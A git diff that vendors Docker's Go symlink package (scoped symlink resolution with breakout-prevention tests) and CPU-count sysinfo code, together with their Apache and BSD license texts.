Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2014-2016 Docker, Inc. + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD new file mode 100644 index 0000000000..9b4f4a294e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD @@ -0,0 +1,27 @@ +Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/docker/docker/pkg/symlink/README.md b/vendor/github.com/docker/docker/pkg/symlink/README.md new file mode 100644 index 0000000000..8dba54fd08 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/README.md @@ -0,0 +1,6 @@ +Package symlink implements EvalSymlinksInScope which is an extension of filepath.EvalSymlinks, +as well as a Windows long-path aware version of filepath.EvalSymlinks +from the [Go standard library](https://golang.org/pkg/path/filepath). + +The code from filepath.EvalSymlinks has been adapted in fs.go. +Please read the LICENSE.BSD file that governs fs.go and LICENSE.APACHE for fs_test.go. diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go new file mode 100644 index 0000000000..f6bc2231f6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go @@ -0,0 +1,144 @@ +// Copyright 2012 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE.BSD file. + +// This code is a modified version of path/filepath/symlink.go from the Go standard library. + +package symlink + +import ( + "bytes" + "errors" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an +// absolute path. This function handles paths in a platform-agnostic manner. +func FollowSymlinkInScope(path, root string) (string, error) { + path, err := filepath.Abs(filepath.FromSlash(path)) + if err != nil { + return "", err + } + root, err = filepath.Abs(filepath.FromSlash(root)) + if err != nil { + return "", err + } + return evalSymlinksInScope(path, root) +} + +// evalSymlinksInScope will evaluate symlinks in `path` within a scope `root` and return +// a result guaranteed to be contained within the scope `root`, at the time of the call. +// Symlinks in `root` are not evaluated and left as-is. +// Errors encountered while attempting to evaluate symlinks in path will be returned. +// Non-existing paths are valid and do not constitute an error. +// `path` has to contain `root` as a prefix, or else an error will be returned. +// Trying to break out from `root` does not constitute an error. +// +// Example: +// If /foo/bar -> /outside, +// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide" +// +// IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks +// are created and not to create subsequently, additional symlinks that could potentially make a +// previously-safe path, unsafe. Example: if /foo/bar does not exist, evalSymlinksInScope("/foo/bar", "/foo") +// would return "/foo/bar". If one makes /foo/bar a symlink to /baz subsequently, then "/foo/bar" should +// no longer be considered safely contained in "/foo". +func evalSymlinksInScope(path, root string) (string, error) { + root = filepath.Clean(root) + if path == root { + return path, nil + } + if !strings.HasPrefix(path, root) { + return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root) + } + const maxIter = 255 + originalPath := path + // given root of "/a" and path of "/a/b/../../c" we want path to be "/b/../../c" + path = path[len(root):] + if root == string(filepath.Separator) { + path = string(filepath.Separator) + path + } + if !strings.HasPrefix(path, string(filepath.Separator)) { + return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root) + } + path = filepath.Clean(path) + // consume path by taking each frontmost path element, + // expanding it if it's a symlink, and appending it to b + var b bytes.Buffer + // b here will always be considered to be the "current absolute path inside + // root" when we append paths to it, we also append a slash and use + // filepath.Clean after the loop to trim the trailing slash + for n := 0; path != ""; n++ { + if n > maxIter { + return "", errors.New("evalSymlinksInScope: too many links in " + originalPath) + } + + // find next path component, p + i := strings.IndexRune(path, filepath.Separator) + var p string + if i == -1 { + p, path = path, "" + } else { + p, path = path[:i], path[i+1:] + } + + if p == "" { + continue + } + + // this takes a b.String() like "b/../" and a p like "c" and turns it + // into "/b/../c" which then gets filepath.Cleaned into "/c" and then + // root gets prepended and we Clean again (to remove any trailing slash + // if the first Clean gave us just "/") + cleanP := filepath.Clean(string(filepath.Separator) + b.String() + p) + if isDriveOrRoot(cleanP) { + // never Lstat "/" itself, or drive letters on Windows + b.Reset() + continue + } + fullP := filepath.Clean(root + cleanP) + + fi, err := os.Lstat(fullP) + if os.IsNotExist(err) { + // if p does not exist, accept it + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + if err != nil { + return "", err + } + if fi.Mode()&os.ModeSymlink == 0 { + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + + // it's a symlink, put it at the front of path + dest, err := os.Readlink(fullP) + if err != nil { + return "", err + } + if system.IsAbs(dest) { + b.Reset() + } + path = dest + string(filepath.Separator) + path + } + + // see note above on "fullP := ..." for why this is double-cleaned and + // what's happening here + return filepath.Clean(root + filepath.Clean(string(filepath.Separator)+b.String())), nil +} + +// EvalSymlinks returns the path name after the evaluation of any symbolic +// links. +// If path is relative the result will be relative to the current directory, +// unless one of the components is an absolute symbolic link. +// This version has been updated to support long paths prepended with `\\?\`. +func EvalSymlinks(path string) (string, error) { + return evalSymlinks(path) +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go new file mode 100644 index 0000000000..22708273d6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go @@ -0,0 +1,15 @@ +// +build !windows + +package symlink + +import ( + "path/filepath" +) + +func evalSymlinks(path string) (string, error) { + return filepath.EvalSymlinks(path) +} + +func isDriveOrRoot(p string) bool { + return p == string(filepath.Separator) +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go new file mode 100644 index 0000000000..7085c0b666 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go @@ -0,0 +1,407 @@ +// +build !windows + +// Licensed under the Apache License, Version 2.0; See LICENSE.APACHE + +package symlink + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +// TODO Windows: This needs some serious work to port to Windows. For now, +// turning off testing in this package. + +type dirOrLink struct { + path string + target string +} + +func makeFs(tmpdir string, fs []dirOrLink) error { + for _, s := range fs { + s.path = filepath.Join(tmpdir, s.path) + if s.target == "" { + os.MkdirAll(s.path, 0755) + continue + } + if err := os.MkdirAll(filepath.Dir(s.path), 0755); err != nil { + return err + } + if err := os.Symlink(s.target, s.path); err != nil && !os.IsExist(err) { + return err + } + } + return nil +} + +func testSymlink(tmpdir, path, expected, scope string) error { + rewrite, err := FollowSymlinkInScope(filepath.Join(tmpdir, path), filepath.Join(tmpdir, scope)) + if err != nil { + return err + } + expected, err = filepath.Abs(filepath.Join(tmpdir, expected)) + if err != nil { + return err + } + if expected != rewrite { + return fmt.Errorf("Expected %q got %q", expected, rewrite) + } + return nil +} + +func TestFollowSymlinkAbsolute(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkAbsolute") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/d/c/data", "testdata/b/c/data", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativePath(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/i", target: "a"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/i", "testdata/fs/a", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkSkipSymlinksOutsideScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSkipSymlinksOutsideScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{ + {path: "linkdir", target: "realdir"}, + {path: "linkdir/foo/bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "linkdir/foo/bar", "linkdir/foo/bar", "linkdir/foo"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkInvalidScopePathPair(t *testing.T) { + if _, err := FollowSymlinkInScope("toto", "testdata"); err == nil { + t.Fatal("expected an error") + } +} + +func TestFollowSymlinkLastLink(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkLastLink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/d", "testdata/b", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativeLinkChangeScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChangeScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/e", target: "../b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/e/c/data", "testdata/fs/b/c/data", "testdata"); err != nil { + t.Fatal(err) + } + // avoid letting allowing symlink e lead us to ../b + // normalize to the "testdata/fs/a" + if err := testSymlink(tmpdir, "testdata/fs/a/e", "testdata/fs/a/b", "testdata/fs/a"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkDeepRelativeLinkChangeScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDeepRelativeLinkChangeScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/f", target: "../../../../test"}}); err != nil { + t.Fatal(err) + } + // avoid letting symlink f lead us out of the "testdata" scope + // we don't normalize because symlink f is in scope and there is no + // information leak + if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/test", "testdata"); err != nil { + t.Fatal(err) + } + // avoid letting symlink f lead us out of the "testdata/fs" scope + // we don't normalize because symlink f is in scope and there is no + // information leak + if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/fs/test", "testdata/fs"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativeLinkChain(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChain") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // avoid letting symlink g (pointed at by symlink h) take out of scope + // TODO: we should probably normalize to scope here because ../[....]/root + // is out of scope and we leak information + if err := makeFs(tmpdir, []dirOrLink{ + {path: "testdata/fs/b/h", target: "../g"}, + {path: "testdata/fs/g", target: "../../../../../../../../../../../../root"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/b/h", "testdata/root", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkBreakoutPath(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutPath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // avoid letting symlink -> ../directory/file escape from scope + // normalize to "testdata/fs/j" + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/j/k", target: "../i/a"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/j/k", "testdata/fs/j/i/a", "testdata/fs/j"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkToRoot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkToRoot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // make sure we don't allow escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkSlashDotdot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSlashDotdot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + tmpdir = filepath.Join(tmpdir, "dir", "subdir") + + // make sure we don't allow escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/../../"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkDotdot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDotdot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + tmpdir = filepath.Join(tmpdir, "dir", "subdir") + + // make sure we stay in scope without leaking information + // this also checks for escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "../../"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativePath2(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath2") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "bar/foo", target: "baz/target"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "bar/foo", "bar/baz/target", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkScopeLink(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkScopeLink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root2"}, + {path: "root", target: "root2"}, + {path: "root2/foo", target: "../bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "root/bar", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRootScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRootScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + expected, err := filepath.EvalSymlinks(tmpdir) + if err != nil { + t.Fatal(err) + } + rewrite, err := FollowSymlinkInScope(tmpdir, "/") + if err != nil { + t.Fatal(err) + } + if rewrite != expected { + t.Fatalf("expected %q got %q", expected, rewrite) + } +} + +func TestFollowSymlinkEmpty(t *testing.T) { + res, err := FollowSymlinkInScope("", "") + if err != nil { + t.Fatal(err) + } + wd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + if res != wd { + t.Fatalf("expected %q got %q", wd, res) + } +} + +func TestFollowSymlinkCircular(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkCircular") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "root/foo", target: "foo"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil { + t.Fatal("expected an error for foo -> foo") + } + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/bar", target: "baz"}, + {path: "root/baz", target: "../bak"}, + {path: "root/bak", target: "/bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil { + t.Fatal("expected an error for bar -> baz -> bak -> bar") + } +} + +func TestFollowSymlinkComplexChainWithTargetPathsContainingLinks(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkComplexChainWithTargetPathsContainingLinks") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root2"}, + {path: "root", target: "root2"}, + {path: "root/a", target: "r/s"}, + {path: "root/r", target: "../root/t"}, + {path: "root/root/t/s/b", target: "/../u"}, + {path: "root/u/c", target: "."}, + {path: "root/u/x/y", target: "../v"}, + {path: "root/u/v", target: "/../w"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/a/b/c/x/y/z", "root/w/z", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkBreakoutNonExistent(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutNonExistent") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/slash", target: "/"}, + {path: "root/sym", target: "/idontexist/../slash"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/sym/file", "root/file", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkNoLexicalCleaning(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkNoLexicalCleaning") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/sym", target: "/foo/bar"}, + {path: "root/hello", target: "/sym/../baz"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/hello", "root/foo/baz", "root"); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go new file mode 100644 index 0000000000..241e531f9d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go @@ -0,0 +1,169 @@ +package symlink + +import ( + "bytes" + "errors" + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/longpath" +) + +func toShort(path string) (string, error) { + p, err := syscall.UTF16FromString(path) + if err != nil { + return "", err + } + b := p // GetShortPathName says we can reuse buffer + n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + if n > uint32(len(b)) { + b = make([]uint16, n) + if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { + return "", err + } + } + return syscall.UTF16ToString(b), nil +} + +func toLong(path string) (string, error) { + p, err := syscall.UTF16FromString(path) + if err != nil { + return "", err + } + b := p // GetLongPathName says we can reuse buffer + n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + if n > uint32(len(b)) { + b = make([]uint16, n) + n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + } + b = b[:n] + return syscall.UTF16ToString(b), nil +} + +func evalSymlinks(path string) (string, error) { + path, err := walkSymlinks(path) + if err != nil { + return "", err + } + + p, err := toShort(path) + if err != nil { + return "", err + } + p, err = toLong(p) + if err != nil { + return "", err + } + // syscall.GetLongPathName does not change the case of the drive letter, + // but the result of EvalSymlinks must be unique, so we have + // EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`). + // Make drive letter upper case. + if len(p) >= 2 && p[1] == ':' && 'a' <= p[0] && p[0] <= 'z' { + p = string(p[0]+'A'-'a') + p[1:] + } else if len(p) >= 6 && p[5] == ':' && 'a' <= p[4] && p[4] <= 'z' { + p = p[:3] + string(p[4]+'A'-'a') + p[5:] + } + return filepath.Clean(p), nil +} + +const utf8RuneSelf = 0x80 + +func walkSymlinks(path string) (string, error) { + const maxIter = 255 + originalPath := path + // consume path by taking each frontmost path element, + // expanding it if it's a symlink, and appending it to b + var b bytes.Buffer + for n := 0; path != ""; n++ { + if n > maxIter { + return "", errors.New("EvalSymlinks: too many links in " + originalPath) + } + + // A path beginning with `\\?\` represents the root, so automatically + // skip that part and begin processing the next segment. + if strings.HasPrefix(path, longpath.Prefix) { + b.WriteString(longpath.Prefix) + path = path[4:] + continue + } + + // find next path component, p + var i = -1 + for j, c := range path { + if c < utf8RuneSelf && os.IsPathSeparator(uint8(c)) { + i = j + break + } + } + var p string + if i == -1 { + p, path = path, "" + } else { + p, path = path[:i], path[i+1:] + } + + if p == "" { + if b.Len() == 0 { + // must be absolute path + b.WriteRune(filepath.Separator) + } + continue + } + + // If this is the first segment after the long path prefix, accept the + // current segment as a volume root or UNC share and move on to the next. + if b.String() == longpath.Prefix { + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + + fi, err := os.Lstat(b.String() + p) + if err != nil { + return "", err + } + if fi.Mode()&os.ModeSymlink == 0 { + b.WriteString(p) + if path != "" || (b.Len() == 2 && len(p) == 2 && p[1] == ':') { + b.WriteRune(filepath.Separator) + } + continue + } + + // it's a symlink, put it at the front of path + dest, err := os.Readlink(b.String() + p) + if err != nil { + return "", err + } + if filepath.IsAbs(dest) || os.IsPathSeparator(dest[0]) { + b.Reset() + } + path = dest + string(filepath.Separator) + path + } + return filepath.Clean(b.String()), nil +} + +func isDriveOrRoot(p string) bool { + if p == string(filepath.Separator) { + return true + } + + length := len(p) + if length >= 2 { + if p[length-1] == ':' && (('a' <= p[length-2] && p[length-2] <= 'z') || ('A' <= p[length-2] && p[length-2] <= 'Z')) { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/README.md b/vendor/github.com/docker/docker/pkg/sysinfo/README.md new file mode 100644 index 0000000000..c1530cef0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/README.md @@ -0,0 +1 @@ +SysInfo stores information about which features a kernel supports. diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go new file mode 100644 index 0000000000..aeb1a3a804 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go @@ -0,0 +1,12 @@ +// +build !linux,!windows + +package sysinfo + +import ( + "runtime" +) + +// NumCPU returns the number of CPUs +func NumCPU() int { + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go new file mode 100644 index 0000000000..5eacd35121 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go @@ -0,0 +1,43 @@ +// +build linux + +package sysinfo + +import ( + "runtime" + "syscall" + "unsafe" +) + +// numCPU queries the system for the count of threads available +// for use to this process. +// +// Issues two syscalls. +// Returns 0 on errors. Use |runtime.NumCPU| in that case. +func numCPU() int { + // Gets the affinity mask for a process: The very one invoking this function. + pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0) + + var mask [1024 / 64]uintptr + _, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) + if err != 0 { + return 0 + } + + // For every available thread a bit is set in the mask. + ncpu := 0 + for _, e := range mask { + if e == 0 { + continue + } + ncpu += int(popcnt(uint64(e))) + } + return ncpu +} + +// NumCPU returns the number of CPUs which are currently online +func NumCPU() int { + if ncpu := numCPU(); ncpu > 0 { + return ncpu + } + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go new file mode 100644 index 0000000000..1d89dd5503 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package sysinfo + +import ( + "runtime" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + kernel32 = windows.NewLazySystemDLL("kernel32.dll") + getCurrentProcess = kernel32.NewProc("GetCurrentProcess") + getProcessAffinityMask = kernel32.NewProc("GetProcessAffinityMask") +) + +func numCPU() int { + // Gets the affinity mask for a process + var mask, sysmask uintptr + currentProcess, _, _ := getCurrentProcess.Call() + ret, _, _ := getProcessAffinityMask.Call(currentProcess, uintptr(unsafe.Pointer(&mask)), uintptr(unsafe.Pointer(&sysmask))) + if ret == 0 { + return 0 + } + // For every available thread a bit is set in the mask. + ncpu := int(popcnt(uint64(mask))) + return ncpu +} + +// NumCPU returns the number of CPUs which are currently online +func NumCPU() int { + if ncpu := numCPU(); ncpu > 0 { + return ncpu + } + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go new file mode 100644 index 0000000000..f046de4b16 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go @@ -0,0 +1,144 @@ +package sysinfo + +import "github.com/docker/docker/pkg/parsers" + +// SysInfo stores information about which features a kernel supports. +// TODO Windows: 